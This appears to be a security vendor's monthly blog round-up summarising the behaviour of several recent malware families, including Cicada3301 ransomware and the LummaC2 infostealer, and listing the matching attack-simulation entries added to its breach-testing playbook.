Cicada3301 Ransomware, LummaC2 Infostealer, Obfuscated Net Loader, and More: Hacker’s Playbook Threat Coverage Round-up: September 2024

In this version of the Hacker’s Playbook Threat Coverage round-up, we are highlighting attack coverage for several new threats. SafeBreach customers can select and run these attacks and more from the SafeBreach Hacker’s Playbook™ to ensure coverage against these advanced threats. Additional details about the threats and our coverage can be seen below. 

Cicada3301 Ransomware – What you need to know

Threat researchers from the cybersecurity firm Truesec have identified a new ransomware group by the name Cicada3301. This ransomware group was first observed in June 2024 after they posted victim details on a blog. Based on the information available, Cicada3301 leverages the ransomware-as-a-service (RaaS) model that employs double extortion to not only steal victim data, but also encrypt their systems.

The Cicada3301 ransomware is written in Rust and can target Windows and LINIX/ESXi systems. The ransomware bears some similarities to ALPHV/Black Cat ransomware, including:

• Both ransomwares are written in Rust
• Use of ChaCha20 for encryption
• Use of identical commands to shutdown virtual machines
• Use of -ui commands to provide graphic output for encryption
• Use of similar convention for file naming
• Key parameters used to decrypt ransom notes

The threat group uses stolen credentials to gain initial access to victim networks. They then use a batch script to execute the ransomware payload against multiple hosts in the victim network. They also Rclone to exfiltrate stolen data outside the network. The ransom note is Base64-decoded and can be decrypted using the first 32 bytes of the submitted key as the CHaCha20 secret key and the last 12 bytes of the submitted key as the nonce. The encryptor will validate the decryption process by checking whether the string ***is_ok*** exists in the decrypted data. 

If the validation is successful, execution proceeds. The encryptor contains a legitimate copy of PsExec embedded within itself, which it will extract and save to the location C:\Users\Public\psexec0.exe. The malware will then create a copy of itself in the C:\Users\Public\ directory. Once copied, it will use the PsExec binary to execute itself several more times, using hard-coded credentials stolen from the victim network during the preceding incursion. This may be an attempt to get the encryptor to run with higher privileges. The encryptor will then run a series of commands to terminate services and processes, delete shadow copies and disable recovery features among other tasks.

SafeBreach Coverage of Cicada3301 Ransomware

The following individual attacks were added to the Hacker’s Playbook and can be individually run to validate organizational controls:

• #10504 – Write Cicada3301 (553eab) ransomware to disk
• #10505 – Pre-execution phase of Cicada3301 (553eab) ransomware (Windows)
• #10506 – Transfer of Cicada3301 (553eab) ransomware over HTTP/S
• #10507 – Transfer of Cicada3301 (553eab) ransomware over HTTP/S
• #10508 – Email Cicada3301 (553eab) ransomware as a compressed attachment
• #10509 – Email Cicada3301 (553eab) ransomware as a compressed attachment

LummaC2 Infostealer – What you need to know

Threat researchers from Ontinue have identified a new variation of the information stealing malware (infostealer) LummaC2 by analyzing an obfuscated PowerShell Command. Lumma is an infostealer written in C programming language that is often used to steal sensitive data. This infostealer is often seen on Russian speaking forums and is often used  as Malware-as-a-Service (MaaS). Once the malware infects the target host, it attempts to steal information from the endpoint and then exfiltrate it to the command-and-control (C2) server.

Based on the information available, this new sample was discovered when a PowerShell encoded command was attempting to communicate with a malicious domain to download the LummaC2 malware. The encoded command was identified as Base64 and upon decoding, the next steps of intrusion could be identified. The malware has an advanced multi-stage infection process and the ability to exploit legitimate system tools.

SafeBreach Coverage of LummaC2 Infostealer

The following individual attacks were added to the Hacker’s Playbook and can be individually run to validate organizational controls:

• #10498 – Write LummaC2 (709a8a) infostealer to disk
• #10499 – Pre-execution phase of LummaC2 (709a8a) infostealer (Windows)
• #10500 – Transfer of LummaC2 (709a8a) infostealer over HTTP/S
• #10501 – Transfer of LummaC2 (709a8a) infostealer over HTTP/S
• #10502 – Email LummaC2 (709a8a) infostealer as a compressed attachment
• #10503 – Email LummaC2 (709a8a) infostealer as a compressed attachment

Obfuscated NET Loader – What you need to know

Threat researchers from Cyble have identified a campaign targeting individuals specifically associated with the upcoming US-Taiwan Defense Industry Conference. These threat actors have been observed using a ZIP archive that contains an LNK file masquerading as a PDF form. This has been done to prevent any suspicion. Once the LNK file is executed, it executes commands to drop an executable in the startup folder that is activated upon system reboot. This new executable gets loaded directly in the memory thereby evading detection by deployed security controls. The executable is protected using .NET’s Confuser, an obfuscation tool, to evade detection and is placed in the startup folder to ensure persistence on the compromised system. Once the executable runs, it retrieves additional malicious content, specifically a DLL file, from a remote server. This DLL file is Encrypted using XOR operation to further obscure its purpose. The deployed payload is used to exfiltrate sensitive data from the victim’s machine to conduct further malicious activities.

SafeBreach Coverage of Obfuscated NET Loader

• #10492 – Write Obfuscated NET (9591d7) loader to disk
• #10493 – Pre-execution phase of Obfuscated NET  (9591d7) loader (Windows)
• #10494 – Transfer of Obfuscated NET (9591d7) loader over HTTP/S
• #10495 – Transfer of Obfuscated NET (9591d7) loader over HTTP/S
• #10496 – Email Obfuscated NET (9591d7) loader as a compressed attachment
• #10497 – Email Obfuscated NET (9591d7) loader as a compressed attachment

Other Threats We Added Coverage for in September 2024

We also added coverage to the following additional threats to ensure an additional, comprehensive level of coverage for our customers.

ShellClient Backdoor– This malware is a custom remote access trojan (RAT) known as GhostShell or ShellClient. It masquerades as a legitimate Windows program such as “RuntimeBroker.exe” or “svchost.exe” to evade detection. This RAT steals and exfiltrates data by using Dropbox as a command-and-control (C2) channel.  This RAT can:

• Collect system information such as hostname, IP address, antivirus products
• Connect to https://ipinfo.io for additional IP information
• Install as service
• Start CMD or PowerShell
• Start TCP / FPT / Telnet client
• Upload, download, and launch PowerShell commands
• Replicate the targeted client for additional connection

The playbook includes the following coverage for this malware:

• #10451 – Write ShellClient (eb03b7) backdoor to disk (HOST_LEVEL)
• #10452 – Pre-execution phase of ShellClient (eb03b7) backdoor (Windows) (HOST_LEVEL)
• #10453 – Transfer of ShellClient (eb03b7) backdoor over HTTP/S (LATERAL_MOVEMENT) 
• #10454 – Transfer of ShellClient (eb03b7) backdoor over HTTP/S (INFILTRATION) 
• #10455 – Email ShellClient (eb03b7) backdoor as a compressed attachment (LATERAL_MOVEMENT) 
• #10456 – Email ShellClient (eb03b7) backdoor as a compressed attachment (INFILTRATION) 

LONEJOGGER Downloader – LONEJOGGER is a downloader/dropper which has been observed targeting cryptocurrency services (including exchanges and investment companies) and uses a .lnk shortcut to download guard railed HTML Application payloads. North Korean threat actors including APT43 have been known to use it to accomplish their objectives including, targeting government organizations, academics, and think tanks in the United States, Europe, Japan, and South Korea.

The playbook includes the following coverage for this malware:

• #10457 – Write LONEJOGGER (c87520) downloader to disk (HOST_LEVEL) 
• #10458 – Transfer of LONEJOGGER (c87520) downloader over HTTP/S (LATERAL_MOVEMENT
• #10459 – Transfer of LONEJOGGER (c87520) downloader over HTTP/S (INFILTRATION)
• #10460 – Email LONEJOGGER (c87520) downloader as a compressed attachment (LATERAL_MOVEMENT) 
• #10461 – Email LONEJOGGER (c87520) downloader as a compressed attachment (INFILTRATION) 

Interested in Protecting Against Advanced Ransomware?

SafeBreach now offers a complimentary and customized real-world ransomware assessment, RansomwareRx, that allows you to gain unparalleled visibility into how your security ecosystem responds at each stage of the defense process. This ransomware assessment includes:

• Training: Understand the methodology around ransomware attacks, persistent threats, and malware attacks.
• Assessment: Review goals and ensure simulation connections to our management console and all configurations are complete.
• Attack Scenario: Run safe-by-design, real-world ransomware attacks across the cyber kill chain on a single device of your choice.
• Report: Receive a custom-built report with simulation results and actionable remediation insights.

Empower your team to understand more about ransomware attacks, methodologies, and behaviors—all through the lens of the attacker. Request your complimentary RansomwareRx assessment today.